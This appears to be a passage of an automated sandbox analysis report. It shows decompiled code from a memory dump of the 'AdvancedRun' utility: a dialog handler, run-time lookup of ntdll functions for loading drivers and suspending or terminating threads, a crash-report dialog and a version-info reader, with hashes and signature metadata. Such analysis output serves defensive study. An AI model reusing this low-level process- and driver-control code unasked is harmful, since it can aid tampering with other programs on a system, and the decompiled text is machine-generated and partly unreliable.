				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                0x00401093
                                                                                                                0x00401096
                                                                                                                0x00401097
                                                                                                                0x0040109b
                                                                                                                0x004010a3
                                                                                                                0x004010a5
                                                                                                                0x00401270
                                                                                                                0x00401278
                                                                                                                0x004012b3
                                                                                                                0x0040127a
                                                                                                                0x00401293
                                                                                                                0x004012a2
                                                                                                                0x004012a2
                                                                                                                0x004012c1
                                                                                                                0x004012d9
                                                                                                                0x004012ea
                                                                                                                0x004012ec
                                                                                                                0x004012f6
                                                                                                                0x00000000
                                                                                                                0x004010ab
                                                                                                                0x004010ab
                                                                                                                0x004010ac
                                                                                                                0x00401231
                                                                                                                0x00401236
                                                                                                                0x00401239
                                                                                                                0x0040123d
                                                                                                                0x00401249
                                                                                                                0x00401249
                                                                                                                0x0040124c
                                                                                                                0x00000000
                                                                                                                0x00401252
                                                                                                                0x00401259
                                                                                                                0x00401265
                                                                                                                0x00000000
                                                                                                                0x00401265
                                                                                                                0x0040123f
                                                                                                                0x0040123f
                                                                                                                0x00401243
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00401243
                                                                                                                0x004010b2
                                                                                                                0x004010b2
                                                                                                                0x004010b5
                                                                                                                0x004011e1
                                                                                                                0x004011e3
                                                                                                                0x004011e6
                                                                                                                0x0040120e
                                                                                                                0x00401216
                                                                                                                0x00000000
                                                                                                                0x0040121c
                                                                                                                0x00401224
                                                                                                                0x00401226
                                                                                                                0x00401229
                                                                                                                0x00000000
                                                                                                                0x0040122f
                                                                                                                0x00000000
                                                                                                                0x0040122f
                                                                                                                0x00401229
                                                                                                                0x004011e8
                                                                                                                0x004011e8
                                                                                                                0x004011ed
                                                                                                                0x004011fb
                                                                                                                0x00401203
                                                                                                                0x00401203
                                                                                                                0x004010bb
                                                                                                                0x004010bb
                                                                                                                0x004010c0
                                                                                                                0x00401151
                                                                                                                0x0040115a
                                                                                                                0x00401168
                                                                                                                0x0040116b
                                                                                                                0x0040116e
                                                                                                                0x00401170
                                                                                                                0x00401173
                                                                                                                0x00401180
                                                                                                                0x00401182
                                                                                                                0x00401185
                                                                                                                0x004011a4
                                                                                                                0x004011ac
                                                                                                                0x00000000
                                                                                                                0x004011b2
                                                                                                                0x004011ba
                                                                                                                0x004011bc
                                                                                                                0x004011c7
                                                                                                                0x004011c9
                                                                                                                0x004011cb
                                                                                                                0x00000000
                                                                                                                0x004011d1
                                                                                                                0x00000000
                                                                                                                0x004011d1
                                                                                                                0x004011cb
                                                                                                                0x00401187
                                                                                                                0x00401187
                                                                                                                0x00401199
                                                                                                                0x00000000
                                                                                                                0x00401199
                                                                                                                0x004010c6
                                                                                                                0x004010c8
                                                                                                                0x004012fd
                                                                                                                0x004012fd
                                                                                                                0x004012fd
                                                                                                                0x004010ce
                                                                                                                0x004010ce
                                                                                                                0x004010d7
                                                                                                                0x004010e5
                                                                                                                0x004010e8
                                                                                                                0x004010eb
                                                                                                                0x004010ed
                                                                                                                0x004010f0
                                                                                                                0x00401102
                                                                                                                0x0040111d
                                                                                                                0x00401125
                                                                                                                0x00000000
                                                                                                                0x0040112b
                                                                                                                0x00401133
                                                                                                                0x00401135
                                                                                                                0x00401140
                                                                                                                0x00401142
                                                                                                                0x00401144
                                                                                                                0x00000000
                                                                                                                0x0040114a
                                                                                                                0x0040114a
                                                                                                                0x00000000
                                                                                                                0x0040114a
                                                                                                                0x00401144
                                                                                                                0x00401104
                                                                                                                0x0040110a
                                                                                                                0x0040110b
                                                                                                                0x0040110b
                                                                                                                0x0040110e
                                                                                                                0x00401115
                                                                                                                0x00401117
                                                                                                                0x00401117
                                                                                                                0x00401102
                                                                                                                0x004010c8
                                                                                                                0x004010c0
                                                                                                                0x004010b5
                                                                                                                0x004010ac
                                                                                                                0x00401303

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                • String ID: AdvancedRun
                                                                                                                • API String ID: 829165378-481304740
                                                                                                                • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                0x00408e38
                                                                                                                0x00408e44
                                                                                                                0x00408e56
                                                                                                                0x00408e68
                                                                                                                0x00408e7a
                                                                                                                0x00408e8c
                                                                                                                0x00408e9e
                                                                                                                0x00408eb0
                                                                                                                0x00408ec2
                                                                                                                0x00408ed4
                                                                                                                0x00408ee6
                                                                                                                0x00408ef8
                                                                                                                0x00408f0a
                                                                                                                0x00408f1c
                                                                                                                0x00408f21
                                                                                                                0x00408f23
                                                                                                                0x00000000
                                                                                                                0x00408f28
                                                                                                                0x00408f29

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                • API String ID: 667068680-4280973841
                                                                                                                • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                0x00408ae3
                                                                                                                0x00408aeb
                                                                                                                0x00408af3
                                                                                                                0x00408b76
                                                                                                                0x00408b8a
                                                                                                                0x00408b91
                                                                                                                0x00408b98
                                                                                                                0x00408bb1
                                                                                                                0x00408bb3
                                                                                                                0x00408bc6
                                                                                                                0x00408bcc
                                                                                                                0x00408bda
                                                                                                                0x00408be0
                                                                                                                0x00408bf3
                                                                                                                0x00408bfa
                                                                                                                0x00408c0b
                                                                                                                0x00408c12
                                                                                                                0x00408c17
                                                                                                                0x00408c1a
                                                                                                                0x00408c2c
                                                                                                                0x00408c39
                                                                                                                0x00408c3d
                                                                                                                0x00408c3f
                                                                                                                0x00408c41
                                                                                                                0x00408c52
                                                                                                                0x00408c58
                                                                                                                0x00408c58
                                                                                                                0x00408c6f
                                                                                                                0x00408c71
                                                                                                                0x00408c73
                                                                                                                0x00408c83
                                                                                                                0x00408c89
                                                                                                                0x00408c89
                                                                                                                0x00408c8a
                                                                                                                0x00408c8f
                                                                                                                0x00408c91
                                                                                                                0x00408c9a
                                                                                                                0x00408c93
                                                                                                                0x00408c93
                                                                                                                0x00408c93
                                                                                                                0x00408c9f
                                                                                                                0x00408ca5
                                                                                                                0x00408caf
                                                                                                                0x00408cbc
                                                                                                                0x00408cc2
                                                                                                                0x00408cc7
                                                                                                                0x00408ccd
                                                                                                                0x00408cd0
                                                                                                                0x00408cd6
                                                                                                                0x00408cd7
                                                                                                                0x00408cd8
                                                                                                                0x00408cde
                                                                                                                0x00408ce3
                                                                                                                0x00408ceb
                                                                                                                0x00408cfe
                                                                                                                0x00408d03
                                                                                                                0x00408d06
                                                                                                                0x00408d0c
                                                                                                                0x00408d21
                                                                                                                0x00408d27
                                                                                                                0x00408d0c
                                                                                                                0x00000000
                                                                                                                0x00408ca7
                                                                                                                0x00408ca7
                                                                                                                0x00408cad
                                                                                                                0x00408d28
                                                                                                                0x00408d2e
                                                                                                                0x00408d35
                                                                                                                0x00408d36
                                                                                                                0x00408d42
                                                                                                                0x00408d48
                                                                                                                0x00408d4e
                                                                                                                0x00408d54
                                                                                                                0x00408d5a
                                                                                                                0x00408d60
                                                                                                                0x00408d66
                                                                                                                0x00408d6c
                                                                                                                0x00408d72
                                                                                                                0x00408d73
                                                                                                                0x00408d7f
                                                                                                                0x00408d85
                                                                                                                0x00408d8a
                                                                                                                0x00408d8f
                                                                                                                0x00408d90
                                                                                                                0x00408da8
                                                                                                                0x00408db9
                                                                                                                0x00408dbf
                                                                                                                0x00408dc5
                                                                                                                0x00408dc5
                                                                                                                0x00000000
                                                                                                                0x00408cad
                                                                                                                0x00408ca5
                                                                                                                0x00408af6
                                                                                                                0x00408afc
                                                                                                                0x00408b07
                                                                                                                0x00408b2a
                                                                                                                0x00408b38
                                                                                                                0x00408b53
                                                                                                                0x00408b56
                                                                                                                0x00408b62
                                                                                                                0x00408b6a
                                                                                                                0x00408b6a
                                                                                                                0x00408b2a
                                                                                                                0x00408b07
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                • {Unknown}, xrefs: 00408BA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                0x0040b04d
                                                                                                                0x0040b05e
                                                                                                                0x0040b060
                                                                                                                0x0040b063
                                                                                                                0x0040b06a
                                                                                                                0x0040b06d
                                                                                                                0x0040b076
                                                                                                                0x0040b07b
                                                                                                                0x0040b07e
                                                                                                                0x0040b084
                                                                                                                0x0040b08e
                                                                                                                0x0040b0a8
                                                                                                                0x0040b0aa
                                                                                                                0x0040b0ad
                                                                                                                0x0040b0b0
                                                                                                                0x0040b0b3
                                                                                                                0x0040b0b6
                                                                                                                0x0040b0b8
                                                                                                                0x0040b0bb
                                                                                                                0x0040b0be
                                                                                                                0x0040b0c1
                                                                                                                0x0040b0c4
                                                                                                                0x0040b0c7
                                                                                                                0x0040b0ca
                                                                                                                0x0040b0cd
                                                                                                                0x0040b0cd
                                                                                                                0x0040b0e5
                                                                                                                0x0040b11f
                                                                                                                0x0040b128
                                                                                                                0x0040b0e7
                                                                                                                0x0040b0e7
                                                                                                                0x0040b0f1
                                                                                                                0x0040b0f2
                                                                                                                0x0040b0f3
                                                                                                                0x0040b0fb
                                                                                                                0x0040b0fd
                                                                                                                0x0040b0fe
                                                                                                                0x0040b11d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040b11d
                                                                                                                0x0040b13c
                                                                                                                0x0040b151
                                                                                                                0x0040b166
                                                                                                                0x0040b17b
                                                                                                                0x0040b190
                                                                                                                0x0040b1a5
                                                                                                                0x0040b1ba
                                                                                                                0x0040b1cf
                                                                                                                0x0040b1d6
                                                                                                                0x0040b1d7
                                                                                                                0x0040b1d8
                                                                                                                0x0040b1de
                                                                                                                0x0040b1e3

                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                • wcscpy.MSVCRT ref: 0040B128
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                • API String ID: 1223191525-1542517562
                                                                                                                • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
